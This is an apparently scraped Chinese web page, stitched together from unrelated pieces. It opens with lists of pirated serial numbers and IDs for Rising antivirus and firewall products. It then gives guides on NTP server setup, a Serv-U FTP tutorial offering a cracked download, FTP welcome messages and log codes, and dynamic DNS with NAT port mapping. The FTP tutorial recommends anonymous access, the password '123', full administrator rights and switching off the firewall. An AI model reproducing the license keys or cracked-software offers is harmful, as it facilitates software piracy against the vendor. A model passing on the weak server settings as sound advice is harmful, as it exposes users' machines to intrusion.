U0I26A-W84GHI-NR8KSB-SU4900 W13KIE-NP8U4J-LV82S3-VH1990
W13KIE-NP8U4J-LV82S3-VH5200 77PUHE-QPV6KB-ME6JS3-KM5200
U0I26A-W84GHI-NR8KSB-SU4300 HNTQPT-4AWW67-13718L-HC4200
W13KIE-NP8U4J-LV82S3-VH6500 W13KIE-NP8U4J-LV82S3-VH1194
U0I26A-W84GHI-NR8KSB-SU2800 JUQVN2-CWEFLP-J7JAC3-Q232O0
W13KIE-NP8U4J-LV82S3-VH1199 W13KIE-NP8U4J-LV82S3-VH9500
U0I26A-W84GHI-NR8KSB-SU3800 U0I26A-W84GHI-NR8KSB-SU9400
W13KIE-NP8U4J-LV82S3-VH6800 52LDJG-Q9LBCT-6ACQS2-R30400
52LDJG-Q9LBCT-6ACQS2-R39600 W13KIE-NP8U4J-LV82S3-VH0990
U0I26A-W84GHI-NR8KSB-SU4300 W13KIE-NP8U4J-LV82S3-VH1690
W13KIE-NP8U4J-LV82S3-VH1190 W13KIE-NP8U4J-LV82S3-VH7900

ID:RCEXBH76 RCEXARP9 RCVUALMS RCHVH5CV

--------------------更多瑞星2005殺毒網路版安裝序列號-------------------
3PVQNT-5JP184-9R8IJB-1F9108
WS1H3W-WUWUU9-JL1D3Q-SF9108
86CEWS-WR44SP-6DGDR4-DAF008
WS1H3W-PLWUU9-JL1D3Q-SF9108
WS1H3W-wuWUU9-JL1D3Q-SF9108
2RE9VM-WUC1QA-51MA0T-DR9108
P28FLA-L0VCQL-BB8NM7-HJA108
-----------------------瑞星個人防火牆 2005版序列號---------------------
SN:36RDFV-PQMJ3W-M65EGV-RN4200 ID: 任意

瑞星個人防火牆下載版
序列號:9G9V0Q-A92E86-AJCTRN-9RD200
升級ID:RCX89JYL
序列號77PUHE-QPV6KB-ME6JS3-KM5200 ID(任意)
序列號:LT4FC3-UF13S0-WBMMS1-U9D200
序列號:9G9V0Q-A92E86-AJCTRN-9RD200
ID:RCESAUW4
ID:F1CMIFNA

瑞星2006下載版 三年升級充列號
殺毒軟體2006 安裝序列號及用戶ID
序列號: E71DBM-SQPAIU-MT06S5-QID200
用戶ID: 4HAWMLBCR24J

瑞星2005序列號及ID
52LDJG-Q9LBCT-6ACQS2-R35200
ID:4AJRY64DNA4GSvM+T
U0I26A-W84GHI-NR8KSB-SU9600 ID:RCVUL38G
52LDJG-Q9LBCT-6ACQS2-R30500 ID:RCEXBGXF
U0I26A-W84GHI-NR8KSB-SU2700 ID:RCHVHSD5
0HM282-5BC8d3-U5MMd1-I20000 ID:RBFJDE8H
RIUEKR-EKNBL6-JLE9S0-9QD200 ID:TA26GFH8
36RDFV-PQMJ3W-M65EGV-RN4200 ID:4AJRY64DNA4G
LKFN4I-U83T14-NB3ARN-13D200 ID:4H9T4551XB4G
WIFBQF-WTJRVB-WWD0SQ-D05200 ID:4AN34IEGRA4A
瑞星個人防火牆下載版
序列號:9G9V0Q-A92E86-AJCTRN-9RD200
升級ID:RCX89JYL
序列號77PUHE-QPV6KB-ME6JS3-KM5200 ID(任意)
序列號:LT4FC3-UF13S0-WBMMS1-U9D200
序列號:9G9V0Q-A92E86-AJCTRN-9RD200
ID:RCESAUW4
ID:F1CMIFNA

瑞星正版終身升級CD-KEY
CD-KEY: RCQJ1KBI

正版瑞星序列號和ID
RCESAUW4
HNTQPT-4AWW67-13718L-HC4200

F1CMIFNA
RIUEKR-EKNBL6-J5E9XX-9QDI04

SBS55XYP
RIUEKR-EKNBL6-I5E9MG-9QDZ04

SB71SQ6W
05VU71-04FE9P-802MRU-DQ5200

RCESC6KG
W13KIE-NP8U4J-LV82S3-VH1192

SBQMACN9
52LDJG-Q9LBCT-6ACQ52-R35200

OBZ6UBUA
52LDJG-Q9LBCT-7ACQS2-R38300

RCHVABRE
RIUEKR-EKNBL6-JLE9TO-9QDZ04

CA2MSL8Q
W13KIE-NP8U4J-LV82S3-VH1192

RCHVBBP1
U0I26A-W84GHI-NR8KSB-SU9500

K1JYINE8
W13KIE-NP8U4J-LV82S3-VH6990

注冊碼:WIFBQF-WTJRVB-WWD0SQ-D05200
ID:4AN34IEGRA4A

8KVCFE-I57J3S-KH6SRV-B2D200
6A7WQ3FAXE41

序列號:RIUEKR-EKNBL6-JLE950-9QD200
用戶ID:4AJRY64DNA4G

SN:R240UA-VGH07A-NK9RS3-IPD200 ID:5ASYTCUYCC4I
SN:JQ1UBP-TV8FAV-77V4S9-9VD200 ID:5AT4S856SB4N
SN:7IM2QA-1TLGMA-GFEHSJ-N4D200 ID:5AT694E3TB43
SN:N345K2-UPQ1D0-NEC1S4-QD5200 ID:4AGLVH3WKA4N
SN:8PD2IH-I638KK-CHRC88-565200 ID:4AWKZ3DXNA4P
SN:SI7BTD-MTHRW3-DN8KS7-0FD200 ID:5A15ETA2DC4L
SN:0R3FW0-P6GSWP-61QKS4-S3D200 ID:5A2D8VZYDC46
SN:585SIB-9A1ETI-RASMSD-AVD200 ID:5A2WWT1GMB4L
SN:JALI7T-4RLCHW-16VNS5-42D200 ID:5A4A1VZHWB4M
SN:RHNF85-EKDSR1-BLERS8-7MD200 ID:5A79JL39YC4Q
SN:MBTERL-UIW3ML-FCRIS3-H5D200 ID:5ALDJIMNIC4X
SN:KRAHNU-56IKDW-99W9S1-1AD200 ID:5AQ5XDZH9B4X
SN:4HA31G-H4AGPC-49F7SF-4CD200 ID:5AQA559VGC48
SN:M3RSQJ-DGVMVC-SCC9SP-QCD200 ID:5AS3RE9GCB48
SN:19G0BS-PAC02V-V2VLSB-F6D200 ID:5AS3YB5TTC4J
SN:J1BG47-CPAT11-S69AS2-UFD200 ID:5AWP5MCG5B4B
SN:F32H9G-JPPKAC-4VDVSS-6TD200 ID:5AQMP82IDB4Z
SN:TJ1A8E-F4PAI3-JQBGSA-BKD200 ID:5AKRZATXWC4F

[分享]瑞星通用序列號

瑞星產品通用
PHHL6F-M4CD9J-UH9PSF-WL5200
4AZD7514214W

Ⅲ NTP伺服器未聯網,怎麼配置

二、配置ntp伺服器端
restrict 0.0.0.0 mask 0.0.0.0 nomodify notrap noquery

restrict 192.168.166.0 mask 255.255.255.0 nomodify

restrict 127.0.0.1

server 210.72.145.44 prefer

server 127.127.1.0

fudge 127.127.1.0 stratum 8

driftfile /var/lib/ntp/drift

keys /etc/ntp/keys

說明:關於許可權設定部分
許可權的設定主要以 restrict 這個參數來設定,主要的語法為:
restrict IP地址 mask 子網掩碼 參數
其中 IP 可以是IP地址,也可以是 default ,default 就是指所有的IP
參數有以下幾個:
ignore:關閉所有的 NTP 聯機服務
nomodify:客戶端不能更改服務端的時間參數,但是客戶端可以通過服務端進行網路校時。
notrust :客戶端除非通過認證,否則該客戶端來源將被視為不信任子網
noquery :不提供客戶端的時間查詢
注意:如果參數沒有設定,那就表示該 IP (或子網)沒有任何限制!

三、查看NTP服務的運行狀況
#watch ntpq -p

參數說明:
remote: 它指的就是本地機器所連接的遠程NTP伺服器
refid: 它指的是給遠程伺服器(e.g. 193.60.199.75)提供時間同步的伺服器
st: 遠程伺服器的層級別(stratum). 由於NTP是層型結構,有頂端的伺服器,多層的Relay Server再到客戶端. 所以伺服器從高到低級別可以設定為1-16. 為了減緩負荷和網路堵塞,原則上應該避免直接連接到級別為1的伺服器的.
t: 這個.....我也不知道啥意思^_^
when: 我個人把它理解為一個計時器用來告訴我們還有多久本地機器就需要和遠程伺服器進行一次時間同步
poll: 本地機和遠程伺服器多少時間進行一次同步(單位為秒). 在一開始運行NTP的時候這個poll值會比較小,那樣和伺服器同步的頻率也就增加了,可以盡快調整到正確的時間范圍.之後poll值會逐漸增大,同步的頻率也就會相應減小
reach: 這是一個八進制值,用來測試能否和伺服器連接.每成功連接一次它的值就會增加
delay: 從本地機發送同步要求到伺服器的round trip time
offset: 這是個最關鍵的值, 它告訴了我們本地機和伺服器之間的時間差別. offset越接近於0,我們就和伺服器的時間越接近
jitter: 這是一個用來做統計的值. 它統計了在特定個連續的連接數里offset的分布情況. 簡單地說這個數值的絕對值越小我們和伺服器的時間就越精確

四、客戶端配置
ntpdate 192.168.166.100
LINUX做為客戶端自動同步時間
如果想定時進行時間校準,可以使用crond服務來定時執行。
編輯 /etc/crontab 文件
加入下面一行:
30 8 * * * root /usr/sbin/ntpdate 192.168.166.100; /sbin/hwclock -w #192.168.0.1是NTP伺服器的IP地址
然後重啟crond服務
service crond restart
這樣,每天 8:30 Linux 系統就會自動的進行網路時間校準。
WINDOWS 需要打開windows time服務和RPC的二個服務
如果在打開windows time 服務,時報 錯誤1058,進行下面操作
1.運行 cmd 進入命令行,然後鍵入
w32tm /register 進行注冊
正確的響應為:W32Time 成功注冊。
2.如果上一步正確,用 net start "windows time" 或 net start w32time 啟動服務。

五、報錯說明
當用ntpdate -d 來查詢時會發現導致 no server suitable for synchronization found 的錯誤的信息有以下2個:

錯誤1.Server dropped: Strata too high
在ntp客戶端運行ntpdate serverIP,出現no server suitable for synchronization found的錯誤。
在ntp客戶端用ntpdate –d serverIP查看,發現有「Server dropped: strata too high」的錯誤,並且顯示「stratum 16」。而正常情況下stratum這個值得范圍是「0~15」。
這是因為NTP server還沒有和其自身或者它的server同步上。
以下的定義是讓NTP Server和其自身保持同步,如果在/ntp.conf中定義的server都不可用時,將使用local時間作為ntp服務提供給ntp客戶端。
server 127.127.1.0 fudge

127.127.1.0 stratum 8

在ntp server上重新啟動ntp服務後,ntp server自身或者與其server的同步的需要一個時間段,這個過程可能是5分鍾,在這個時間之內在客戶端運行ntpdate命令時會產生no server suitable for synchronization found的錯誤。
那麼如何知道何時ntp server完成了和自身同步的過程呢?
在ntp server上使用命令:

# watch ntpq -p

出現畫面:

Every 2.0s: ntpq -p Thu Jul 10 02:28:32 2008
remote refid st t when poll reach delay offset jitter
==============================================================================
192.168.30.22 LOCAL(0) 8 u 22 64 1 2.113 179133. 0.001
LOCAL(0) LOCAL(0) 10 l 21 64 1 0.000 0.000 0.001

注意LOCAL的這個就是與自身同步的ntp server。
注意reach這個值,在啟動ntp server服務後,這個值就從0開始不斷增加,當增加到17的時候,從0到17是5次的變更,每一次是poll的值的秒數,是64秒*5=320秒的時間。
如果之後從ntp客戶端同步ntp server還失敗的話,用ntpdate –d來查詢詳細錯誤信息,再做判斷。

錯誤2.Server dropped: no data
從客戶端執行netdate –d時有錯誤信息如下:
transmit(192.168.30.22)
transmit(192.168.30.22)
transmit(192.168.30.22)
transmit(192.168.30.22)
transmit(192.168.30.22)
192.168.30.22: Server dropped: no data
server 192.168.30.22, port 123
.....
28 Jul 17:42:24 ntpdate[14148]: no server suitable for synchronization found
出現這個問題的原因可能有2:

1.檢查ntp的版本,如果你使用的是ntp4.2(包括4.2)之後的版本,在restrict的定義中使用了notrust的話,會導致以上錯誤。
使用以下命令檢查ntp的版本:
# ntpq -c version

下面是來自ntp官方網站的說明:
The behavior of notrust changed between versions 4.1 and 4.2.
In 4.1 (and earlier) notrust meant "Don't trust this host/subnet for time".
In 4.2 (and later) notrust means "Ignore all NTP packets that are not cryptographically authenticated." This forces remote time servers to authenticate themselves to your (client) ntpd
解決:
把notrust去掉。

2.檢查ntp server的防火牆。可能是server的防火牆屏蔽了upd 123埠。
可以用命令
#iptables INPUT -p udp -m udp --dport 123 -j ACCEPT
如果覺得麻煩就直接把防火牆停掉
#service iptables stop

來關掉iptables服務後再嘗試從ntp客戶端的同步,如果成功,證明是防火牆的問題,需要更改iptables的設置。

Ⅳ 區域網內架設網站(高手請進)

【怎樣建立個人FTP】

Serv-U FTP Server 5.0.0.11 final 特別破解版漢化版
點擊下載

《FTP Serv-U 教程》+《FTP的建立和維護手冊》
點擊下載

在網上做過軟體下載的人都知道,建立一個FTP下載伺服器相對比較簡單,一般用WIN2000下自帶的IIS就可以,但IIS在功能上好多都不盡人如意,下面我就介紹一款功能非常強大,但使用簡單的FTP伺服器構建軟體-Serv-U FTP Server,讓我們也來體驗一下自己DIY FTP伺服器的快樂! 在說明使用之前,讓我先大致介紹一下Serv-U(本文中提到Serv-U版本為3.0.0.17), Serv-U 是一個可以運行於Windows 95/98/2000/ME 和 Windows NT 4.0下的FTP伺服器程序如圖所示,

有了它,你的個人電腦就可以模擬為一個FTP伺服器,也就是說,你所連接的網路中的計算機用戶可以訪問你的個人電腦,通過FTP協議(文件傳輸協議)復制、移動、刪除你的電腦中的文件或文件夾,可以做一切許可權所允許的事情。FTP協議規定了計算機之間的標准通訊方式,使所有不同類型,不同操作系統,不同格式的電腦之間得以互換文件。它可以用最簡單的方式創建用戶帳號,並且在硬碟空間上劃分一定的區域用以存放文件,讓用戶以各種FTP客戶端軟體(如CuteFTP、WS_FTP等)上傳或下載所需要的文件。

有許多FTP伺服器和客戶端軟體可用於不同的系統中,Serv-U是用於運行MS-Windows 並且已安裝了WinSock 版本 1.1 兼容 TCP/IP協議的個人電腦中的,這幾乎包括了所有的Windows操作系統。

Serv-U由兩大部分組成,引擎和用戶界面。Serv-U引擎(ServUDaemon.exe)其實是一個常駐後台的程序,也是Serv-U整個軟體的心臟部分,它負責處理來自各種FTP客戶端軟體的FTP命令,也是負責執行各種文件傳送的軟體。在運行Serv-U引擎也就ServUDaemon.exe
文件後,我們看不到任何的用戶界面,它只是在後台運行,通常我們無法影響它,但在ServUAdmin.exe中我們可以停止和開始它。Serv-U引擎可以在任何Windows平台下作為一個本地系統服務來運行,系統服務隨操作系統的啟動而開始運行,而後我們就可以運行用戶界面程序了。在Win NT/2000系統中,Serv-U會自動安裝為一個系統服務,但在Win 9x/Me中,你需要在「伺服器」面板中選擇「自動開始」,才能讓它轉為系統服務。Serv-U用戶界面(ServUAdmin.exe)也就是Serv-U管理員,它負責與Serv-U引擎之間的交互。它可以讓用戶配置 Serv-U,包括創建域、定義用戶、並告訴伺服器是否可以訪問。啟動Serv-U管理員最簡單的辦法就是直接點接系統欄的「U」形圖標,當然,你也可以從開始菜單中運行它。

在此有必要把Serv-U中的一些重要的概念給大家講清楚:每個正在運行的Serv-U引擎可以被用來運行多個「虛擬」的FTP伺服器,在管理員程序中,每個「虛擬」的FTP伺服器都稱為「域」,因此,對於伺服器來說,不得不建立多個域時是非常有用的。每個域都有各自
的「用戶」、「組」和設置。一般說來,「設置向導」會在你第一次運行應用程序時設置好一個最初的域和用戶帳號。伺服器、域和用戶之間的關系大家可以參考下表:
*Serv-U 伺服器
*域 1
*用戶帳號 1
*用戶帳號 2
*用戶帳號 3
*域 2
*用戶帳號 1
*用戶帳號 2
*域 3
*用戶帳號 1
*用戶帳號 1

這個表有點類似與Serv-U管理員中伺服器、域和用戶的排列。

Serv-U FTP Server 是試用軟體,安裝後三十天內,你可以作為「專業版本」使它,但試用期過後,你就只能作為免費的「個人版
本」使用了,只有基本功能了。

好了,說了這么多,還沒到關鍵部分-如何自己來建立FTP伺服器。下面我就一步一步來說明。
一、 安裝原版軟體和漢化補丁,這個過程就不多說了,想必沒人不會的。
二、 建立第一個本地FTP伺服器
安裝完成後程序會自動運行,你也可以在菜單中選擇運行。
1、 第一次運行程序,它會彈出設置向導窗口如圖,

將會帶你完成最初的設置,
2、 單擊「下一步」,出現「顯示菜單圖像」的窗口,問你是否在菜單中顯示小圖像,看各人喜歡了;
3、 單擊「下一步」,這個窗口是讓你在本地第一次運行FTP伺服器,只要「下一步」就行了。
4、 接下來要你輸入你的IP地址如圖,

如果你自己有伺服器,有固定的IP,那就請輸入IP地址,如果你只是在自己電腦上建立FTP,而且又是撥號用戶,有的只是動態IP,沒有固定IP,那這一步就省了,什麼也不要填,Serv-U 會自動確定你的IP地址,「下一步」;
5、 在這兒要你輸入你的域名,如圖

如果你有的話,如:ftp.abc.com,沒有的話,就隨便填一個;
6、 「下一步」,詢問你是否允許匿名訪問如圖

一般說來,匿名訪問是以Anonymous為用戶名稱登錄的,無需密碼,當然如果你想成立一個會員區什麼的,就應該選擇「否」,不讓隨便什麼人都可以登錄,只有許可用戶才行,在此我們填「是」;
7、 「下一步」,問你匿名用戶登錄到你的電腦時的目錄,如圖,

你可以自己指定一個硬碟上已存在的目錄,如F:\temp\xyz;
8、 「下一步」,詢問你是否要鎖定該目錄,鎖定後,匿名登錄的用戶將只能認為你所指定的目錄(F:\temp\xyz)是根目錄,也就是說他只能訪問這個目錄下的文件和文件夾,這個目錄之外就不能訪問,對於匿名用戶一般填「是」;
9、 「下一步」,詢問你是否創建命名的帳號,也就是說可以指定用戶以特定的帳號訪問你的FTP,這對於辦會員區可很有用哦,你可以對於每個人都創建一個帳號,每個帳號的許可權不同,就可以不同程序地限制每個人的權利,方法將在後面講到,這里選擇「是」;
10、 「下一步」,請你填入所要建立的帳號的名稱,如圖,如:ldr,

11、 「下一步」,請輸入密碼,如:123,
12、 「下一步」,詢問登錄目錄是什麼,這一步與第7步一樣,如:F:\temp
13、 「下一步」,詢問你是否要鎖定該目錄,同第8步,這里選擇「否」;
14、 接下來詢問你這次創建的用戶的管理員許可權,如圖,

有幾項選擇:無許可權,組管理員,域管理員,只讀管理員和系統管理員,每項的許可權各不相同;這里選擇「系統管理員」;
15、 最後一步,點擊「完成」就OK了,你有什麼需要修改的,可以點「上一步」,或者進入Serv-U管理員直接修改。至此,我們建立
了一個域ftp.abc.com,兩個用戶,一個Anonymous,一個ldr。

三、 既然我們已經建立好FTP伺服器,那麼我們就應該可以用FTP客戶端軟體來嘗試登錄。
怎麼辦呢?其實很簡單,我們不用上網,就可以測試。我們知道,不上網時,本地機的IP地址默認就為127.0.0.1,FTP埠號為21。打開FTP客戶端軟體,我就用FlashFXP來說明,打開快速連接,填入相應內容,如圖

然後連接,如圖

可以看到,我左邊窗格以Anonymous登錄,右邊窗格以ldr登錄,由於是本地機,所以速度奇快,上網後,假如我要讓你登錄到我的電腦上,我只要把我的上網時的IP地址給你,你就可以匿名訪問我的電腦了(注意不要開防火牆),是不是很方便?

四、Serv-U管理員中的各項設置
在設置完成後,將會進入Serv-U管理員的主界面,如圖

左邊窗格中顯示各個欄目,右邊窗格中顯示各個欄目的具體選項,下面就大概講一講設置內容。
1、 在圖中,我們可以人為地控制Serv-U引擎的運行或停止,記住,在Win 9x/Me 中,我們就要在此選擇「系統服務」,才會運行
Serv-U引擎。
2、 「許可」,如果你花美元買了注冊號,就可以在此輸入。
3、 「設置」,這個設置是對於「本地伺服器」來說的。「常規」設置中,如圖

可以限制伺服器的最大速度,可以攔截FXP(站點到站點傳送),也可以限制用戶的數量,這樣不至於你的伺服器被拖跨。「目錄緩存」設置中,如圖

允許你自己確定目錄列表的個數以及超時時間,在Windows 95 和 NT下,目錄列表默認設置為25,當緩存滿了之後,新的請求將替換老的請求。「高級」設置中,如圖

可以讓你自己定義伺服器、Socket、文件的上傳和下載的各項設置。
4、 「活動」,在這里記錄了用戶的活動日誌,已封鎖的IP的活動日誌,以及任務日誌;任務日誌中顯示的就是你開始停止的各項操作記錄,你可以點擊右擊,選擇一此過濾文本,使其只顯示你所想見的內容,如圖

5、 「域」,這里包含了你一開始根據向導所建立的用戶、設置、域等。「域--設置」中所設置的內容其實與第3步差不多,只是它更
加具體,可以對於每一個不同域定製。「域--活動」中記載了這個域下所有用戶的活動情況。
6、 「域--組」,我們可以自己建立一些便於管理的組,然後把一類的用戶歸到一個組中。
7、 「域--用戶」中,大家可以看到一開始我們建立的兩個帳號,一個Anonymous,一個ldr。現在就帳號ldr來對其中的細節設置說明一下。
A、「帳號」欄,如圖

對於一些不守規則的人,我們可以選擇「禁用帳號」,雖然有帳號,但可以使用戶一時間無法登錄;你也可以設置讓程序到達某個日期後自動刪除某個帳號;下面幾欄是這個帳號的基本信息,我們都可以在此更改,其中密碼改過後並不顯示,而是統一顯示<>,特別要注意選項「鎖定用戶於主目錄」,什麼意思呢?大家應該碰到,每次我們登錄到FTP伺服器上後,在根目錄下只顯示「/」,選擇這項選項後,就是這樣,如果不選,會出現什麼情況呢?你可以做一下試驗,在根目錄下將顯示「/f:/temp/」,也就是說顯示了你硬碟中的絕對
地址,這在某些情況下是很危險的,有不懷好意的高手,你就麻煩了!

你可以隱藏屬性為隱藏的文件,可以限制同一IP的登錄個數,是否允許用戶更改密碼(這需要客戶端軟體的支持),最大上傳下載的速
度,超時時間以及空閑時間,你也可以限制最大用戶數量,如20,說明同時只能有20個用戶登錄。
C、「目錄訪問」欄,如圖

在此你可以控制用戶對於文件目錄的許可權,對文件有讀取、寫入、刪除、追加、執行等操作,對於文件夾有列表、創建、刪除,以及是否繼承子目錄;如果覺得目錄不夠,你也可以添加可訪問的目錄。
D、「IP訪問」欄,如圖

在這里你可以規定某個IP是否可以訪問你的FTP伺服器,你可以拒絕它的訪問,只要填上相應的IP地址,以後由這個IP的訪問通通被攔下。
E、「上傳/下載率」欄,如圖

在這里你可以設置上傳和下載之間的比值,控制好上傳和下載之間的數據流量關系。
F、「配額」欄,如圖

這里你可以為每個FTP用戶設置磁碟空間,點擊「計算當前」,可以知道當前目前下的所有空間大小,在「最大」一欄中填入你想要限制的容量。

最後有一點,改過設置後一定要點擊右鍵,選擇「應用」使設置生效才行,否則一切都白做了!!
希望大家學會後,能為更多的人提供下載,享受寬頻帶來的快樂!

==========================================================================================================

SERV-U FTP的歡迎詞設置
讓你的SERV-U FTP看起來更專業一點
現在很多的朋友都用SERV-U做個人FTP的伺服器,有關如何使用SERV-U架設伺服器的文章很多了,這兒我就不多說了。不過大家不知道注意到了沒有,當你登陸很多FTP的時候,會顯示一些歡迎信息,比如說顯示你的IP,告訴你目前有多少人在使用FTP,帶寬是多少等等。。。看起來就比較的專業樣子。其實你自己也是可以做的,SERV-U這個軟體本身就有這個功能。下面我就說明以下如何在自己的FTP裡面加上這些信息。

第一、先建立一個文本文件,隨便取一個名字。我們這兒就取message.txt吧。

第二、這個這個文本文件裡面加上這些文字

-----------------------------------
歡迎來到XXX的個人FTP伺服器
你的IP地址是:%IP
目前伺服器所在的時間是 %time
已經有 %u24h 個用戶在最近24小時訪問過本FTP
本FTP伺服器已經運行了 %ServerDays 天,%ServerHours 小時 和 %ServerMins 分。

伺服器的運行情況:

所有登陸用戶數量: %loggedInAll total
當前登陸用戶數量: %Unow
已經下載位元組數: %ServerKbDown Kb
已經上傳位元組數: %ServerKbUp Kb
已經下載文件數: %ServerFilesDown
已經上傳文件數: %ServerFilesUp
伺服器平均帶寬: %ServerAvg Kb/sec
伺服器當前帶寬: %ServerKBps Kb/sec
------------------------------------

其中XXX可以改成你的名字

你也可以加上一些你自己認為喜歡的文字,不過要注意的是每行最好不要超過80個字元

其中以%開頭的都是一些變數,下面是SERV-U能支持的變數

時間和日期

%Time - 顯示你的計算機當前時間
%Date - 顯示你的計算機當前日期

伺服器的統計信息

%ServerDays - 顯示伺服器已經運行的天數
%ServerHours - 顯示伺服器已經運行的小時數
%ServerMins - 顯示伺服器已經運行的分鍾數
%ServerSecs - 顯示伺服器已經運行的秒數
%ServerKbUp - 顯示自從伺服器運行以來已經上傳的位元組數
%ServerKbDown - 顯示自從伺服器運行以來已經下載的位元組數
%ServerFilesUp - 顯示自從伺服器運行以來已經上傳的文件數
%ServerFilesDown - 顯示自從伺服器運行以來已經下載的文件數
%LoggedInAll - 顯示自從伺服器運行以來已經登陸的用戶數
%ServerAvg - 顯示伺服器的平均帶寬
%ServerKBps - 顯示伺服器的當前帶寬

伺服器的設定信息

%MaxUsers - 顯示伺服器能同時登陸的最大用戶數量
%MaxAnonymous - 顯示伺服器能同時登陸的最大匿名用戶數量

用戶信息

%Name - 顯示登陸的用戶名
%IP - 顯示登陸的用戶IP地址
%Dir - 顯示登陸的用戶的當前目錄
%Disk - 顯示登陸的用戶的當前磁碟
%DFree - 顯示登陸的用戶的當前磁碟空間,單位是MB
%FUp - 顯示登陸的用戶上傳的文件數量
%FDown - 顯示登陸的用戶下載的文件數量
%FTot - 顯示登陸的用戶上傳和下載的總的文件數量
%BUp - 顯示登陸的用戶上傳的位元組數,單位是KB
%Bdown - 顯示登陸的用戶下載的位元組數,單位是KB
%BTot - 顯示登陸的用戶上傳和下載的總位元組數,單位是KB
%TconM - 顯示登陸用戶連接時間,單位是分鍾
%TconS - 顯示登陸用戶連接時間,單位是秒,要和%TconM一起使用
%RatioUp - 顯示登陸用戶的上傳流量限制
%RatioDown - 顯示登陸用戶的下載流量限制
%RatioCredit - 顯示登陸用戶還有多少credit可以上傳和下載,這個是針對有些FTP是要上傳多少文件,才能下載多少文件而設置的
%QuotaUsed - 顯示登陸用戶的已經使用了多少空間,單位是KB
%QuotaLeft - 顯示登陸用戶的還有多少空間可以使用,單位是KB
%QuotaMax - 顯示登陸用戶的的最大空間,單位是KB
後面3個是針對有磁碟限制的用戶設置的

用戶數量

%UNow - 顯示當前有多少用戶連接
%UAll - 顯示從伺服器運行以來一共有多少用戶連接過
%U24h - 顯示最近24小時有多少用戶
%UAnonAll - 顯示當前總的匿名用戶數量
%UAnonThisIP - 顯示所有匿名登陸的用戶數
%UNonAnonAll - 顯示所有當前非匿名登陸用戶數
%UNonAnonThisIP - 顯示所有非匿名登陸用戶數
%UThisName - 顯示所有使用這個名字登陸的用戶數

自己在先建立一個.txt文件,輸入你想要顯示的文字,具體參數看上面的內容,然後在Serv_u內的server設置裡面,加入這個.txt文件就可以了

==========================================================================================================

——常見FTP登陸Log信息——
常見FTP登陸Log信息

1.
Connected. Waiting for response.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER anonymous
530 Sorry, no ANONYMOUS access allowed.
QUIT
這個就是不許匿名登錄啦

2.
Connected. Waiting for response.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER test
331 User name okay, need password.
PASS xxxxxx
530 Not logged in.
QUIT
一般是密碼輸入錯誤時出現的信息,但對於Serv-U來說,如果沒有這個帳號(test)存在,也會產生同樣的出錯信息。

3.
Connecting to xxx.xxx.xxx.xxx, Port 21 (#1)
ERROR: Connection timed out
這個表明對方未開機,也可能是對方不在你能訪問的范圍內

4.
Connecting to xxx.xxx.xxx.xxx Port 21 (#1)
ERROR: Connection refused
這個一般表明對方已開機,但未開啟FTP服務(沒有開Serv-U)
也可能為對方不提供在這個埠上的服務

5.
Connecting to xxx.xxx.xxx.xxx, Port 21 (#1)
Connected. Waiting for response.
Disconnected from server.
Connection attempt failed. Waiting for retry...
出現這個信息實在是很倒霉,你極有可能被對方Ban了。
如果只是Ban幾分鍾or幾小時or一天還好,不然只有和站長說說好話,讓他給你解封吧。

6.
Connecting to xxx.xxx.xxx.xxx, Port 21 (#1)
Connected. Waiting for response.
USER XXX
331 User name okay, need password
PASS xxxxxx
530 Not logged in, unauthorized IP address.
QUIT
這個有點麻煩,你的IP不在站長允許訪問的IP范圍內,只有和站長聯系,讓他把你的IP網段加入Allow Access列表裡吧

7.
Connected. Waiting for response.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER user
421 Too many users - please try again later.
哈哈,這個很常見吧,用戶太多

8.
Connected. Waiting for response.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER test
530 Not logged in, only one session from same IP allowed at a time.
QUIT
每個IP只能開一個下載,就不要用多線程啦,小心Ban了你。

----------------------------------------------------------------------------------------------

內網、區域網如何設置IP,建立FTP
首先,我們知道動態IP機器出去的最大問題是IP,因為動態IP機器的IP外網是無法識別的,我們討論的是最普通的區域網內工作站出去做FTP和WEB站點的問題!
動態域名解析正好能夠解決此類問題,它的原理是將本機的動態IP自動映射到預先申請好的虛擬域名上,這樣外面就可以通過訪問固定的虛擬域名來訪問到動態IP機器了。
<花生殼>該軟體使用方便,幾乎不用動什麼腦筋,唯一要做的事情就是去注冊,然後申請一個以vicp.net為後綴虛擬域名。
1.進入http://www.oray.net/,下載<花生殼>,並「注冊網域護照」!
2.注冊完成後,登陸「我的控制台」

3.進入「我的控制台」,點擊左下角的『我要.激活花生殼服務』

4.點擊「開始」進入

在『免費域名』填入不重復的你想要得名字就是你將來的域名,例如:AGHU

5.以後就是「服務條款」和「填寫站點信息」,這些地球人都知道怎麼填!
填完結束,恭喜你,你的域名已經有了!例如:你以後的域名就是AGHU.VICP.NET
申請完免費域名以後,就安裝你已經下載的<花生殼>,然後打開運行

輸入你的注冊名和密碼,等一下就會激活你的域名,興奮吧!
然後你的ftp和web就可以啟動咯!
架設ftp伺服器的事情,另外有帖子詳細介紹了!!
======================================
區域網內公開的ip只有一個,除非你是在主機上建私服,否則你無法公開你的私服,只能在區域網內,解決的辦法如下。
由於公網ip地址有限,不少isp都採用多個內網用戶通過代理和網關路由共用一個公網ip上internet的方法,這樣就限制了這些用戶在自己計算機上架設個人網站。要實現對我們來說是比較困難的,首先得得到系統管理員的支持才能夠實現。因為這一切的設置必須在代理伺服器上做的。要實現這一點,可以用windows 2000 服務者 的埠映射功能,除此之外winroute pro也具有這樣的功能,還有各種企業級的防火牆。而對於我們這些普通用戶,恐怕還是用windows 2000 的轉換以解決ip地址匱乏問題。在防火牆上實現nat後,可以隱藏受保護網路的內部拓撲結構,在一定程度上提高網路的安全性。如果反向nat提供動態網路地址及埠轉換功能,還可以實現負載均衡等功能埠映射功能可以讓內部網路中某台機器對外部提供www服務。 埠映射功能還可以完成一些特定代理功能,比如代理pop,smtp,telnet等協議。理論上可以提供六萬多個埠的映射,恐怕我們永遠都用不完的。

一、下面來介紹一下通過nat共享上網和利用nat來實現埠映射。

1、在windows 2000 server上,從管理工具中進入「路由和遠程訪問」(routing 並且 遙遠 access)服務,在伺服器上滑鼠右擊,-》「配置並啟用路由和遠程訪問」

2、點「下一步」

3、選「internet連接伺服器」,讓內網主機可以通過這台伺服器訪問internet.(最好先配置好nat共享,讓內網主機可以正常上網,不然的話,配好埠映射後再來配置nat共享就有點麻煩了,弄的不好nat還共享不了。)

